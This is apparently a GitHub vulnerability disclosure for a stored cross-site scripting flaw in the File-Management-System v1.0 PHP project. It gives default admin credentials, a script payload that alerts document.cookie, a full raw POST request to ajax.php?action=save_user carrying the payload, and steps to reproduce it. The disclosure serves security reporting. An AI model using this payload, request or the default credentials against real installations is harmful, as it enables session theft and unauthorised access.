Skip to content

flyasolo/File-Management-System

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

File-Management-System v1.0 by itsourcecode.com has Cross-site Scripting (XSS)

The password for the backend login account is: admin/1

vendors: https://itsourcecode.com/free-projects/php-project/file-management-system-in-php-with-source-code/

Vulnerability File: /filesystem/ajax.php

Vulnerability location: /filesystem/ajax.php?action=save_user HTTP/1.1

[+] Payload: <script>alert(document.cookie)</script>

Tested on Windows 10, phpStudy

There is an example with alert:

POST /filesystem/ajax.php?action=save_user HTTP/1.1
Host: 10.12.180.79
Content-Length: 92
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.41
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.12.180.79
Referer: http://10.12.180.79/filesystem/index.php?page=users
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=d4me9tekbcuef2k8k1qupv9i0t
Connection: close

id=1&name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&username=admin&password=1&type=1

Click Users on the left

image

then click the edit button as shown in the screenshoot

image

input a XSS script in Name input,and click save

image

soon you will see an alert showing your cookie

image

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published